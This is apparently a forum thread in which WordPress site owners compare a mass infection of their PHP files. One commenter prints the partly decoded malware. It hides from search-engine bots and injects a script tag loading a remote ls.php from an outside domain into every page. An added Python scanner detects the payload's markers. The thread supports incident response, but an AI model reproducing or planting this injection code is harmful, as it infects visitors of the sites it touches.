FYI, I don’t have any indication that my hosting password was compromised, since it was very secure and I haven’t seen damage apart from the WP site.
Maybe they should contact this guy. He seems to know what he’s doing.
http://www.youtube.com/watch?v=nabz7t65eUM
Steve D: Wow. I am wondering if that has been fixed already.
But in these latest issues, the sites are not restricted to one hosting provider.
Hello, my sites in WordPress have the same problems…
All the websites made with WordPress have a strange JS code that prints an iframe…
How can I fix it…?
P.S. They are not on Network Solutions
dragoonslair: Where is your site hosted?
Check your footer.php, because in one case just this file was hacked. On others, everything was.
I have about 10 sites infected. All hosted on Bluehost.
Does anyone here that got infected have a site with Apache logging enabled?
We would love to see the logs if anyone can share.
I’ve taken all of my sites offline until we can sort this out.
Will there be a security release from WP?
No one knows yet how they got in. I am assuming it is not a bug in WordPress itself, otherwise the chaos would be much bigger.
Maybe a plugin, stolen password?
All my sites were hacked also.
Running on GoDaddy servers and running WP 2.9.1
Every single PHP file on the ENTIRE site has the malicious Base 64 code at the top. Didn’t miss a single PHP file.
Here is the Base 64 code “decoded”, well sort of! Interesting, notice the googlebot and yahoo code.
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){
  $GLOBALS['mr_no']=1;
  if(!function_exists('mrobh')){
    if(!function_exists('gml')){
      function gml(){
        if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
          return base64_decode("<script src="http://indesignstudioinfo.com/ls.php"></script>");
        }
        return "";
      }
    }
    if(!function_exists('gzdecode')){
      function gzdecode(<script src="http://indesignstudioinfo.com/ls.php"></script>){
        $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
        $RBE4C4D037E939226F65812885A53DAD9=10;
        $RA3D52E52A48936CDE0F5356BB08652F2=0;
        if($R30B2AB8DC1496D06B230A71D8962AF5D&4){
          $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
          $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
          $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
        }
        if($R30B2AB8DC1496D06B230A71D8962AF5D&8){
          $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
        }
        if($R30B2AB8DC1496D06B230A71D8962AF5D&16){
          $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
        }
        if($R30B2AB8DC1496D06B230A71D8962AF5D&2){
          $RBE4C4D037E939226F65812885A53DAD9+=2;
        }
        $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
        if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
          $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
        }
        return $R034AE2AB94F99CC81B389A1822DA3353;
      }
    }
    function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
      Header('Content-Encoding: none');
      $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
      if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
        return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
      }else{
        return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
      }
    }
    ob_start('mrobh');
  }
}
You can see at the bottom where it’s “looking” for the BODY tag.
Other sites I manage on Hostgator and even Bluehost were not affected.
For now… just killed all of the sites by replacing the index file.
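Added example, not part of any commenter's post: a Python scan that lists every PHP file whose top carries the identifiers seen in the decoded code above (`mr_no`, `mrobh`, `gml`), either in clear text or inside a `base64_decode("...")` literal. The function names, the 64 KB head limit, the assumed `base64_decode("...")` wrapper and the sample files are assumptions made for this example; the sample "infected" file is constructed and holds only an inert stub.

```python
import base64, binascii, re, tempfile
from pathlib import Path

# Identifiers taken from the decoded payload quoted in the comment above.
MARKERS = (b"mr_no", b"mrobh", b"function gml(")
# Assumption: the injected blob is wrapped as base64_decode("...") or ('...').
B64_CALL = re.compile(rb"base64_decode\s*\(\s*([\"'])([A-Za-z0-9+/=\s]{40,})\1")
HEAD_BYTES = 64 * 1024  # the thread reports the code at the top of each file


def inspect_php(path):
    """Return the sorted markers found in the head of one PHP file."""
    head = Path(path).read_bytes()[:HEAD_BYTES]
    found = {m for m in MARKERS if m in head}  # payload left in clear text
    for match in B64_CALL.finditer(head):
        try:
            decoded = base64.b64decode(b"".join(match.group(2).split()))
        except (binascii.Error, ValueError):
            continue  # not valid base64, nothing to inspect
        found.update(m for m in MARKERS if m in decoded)
    return sorted(m.decode() for m in found)


def scan_tree(root):
    """Map each suspicious *.php file under root to the markers it contains."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        markers = inspect_php(path)
        if markers:
            hits[path.relative_to(root).as_posix()] = markers
    return hits


def build_demo_tree(root):
    """Constructed sample files: one clean, one with an inert encoded stub."""
    stub = b"if(!isset($GLOBALS['mr_no'])){ function gml(){} ob_start('mrobh'); }"
    root = Path(root)
    (root / "theme").mkdir()
    (root / "index.php").write_bytes(b"<?php echo 'hello'; ?>\n")
    (root / "theme" / "footer.php").write_bytes(
        b'<?php /**/ eval(base64_decode("' + base64.b64encode(stub) + b'")); ?>\n')
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for name, markers in scan_tree(build_demo_tree(tmp)).items():
            print(name, markers)
```

Run `scan_tree()` against an offline copy of the web root; a hit only identifies files to restore from a known-good source and does not explain how the files were modified.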
This happened to me today, on a site hosted with godaddy, which doesn’t run WordPress and never has.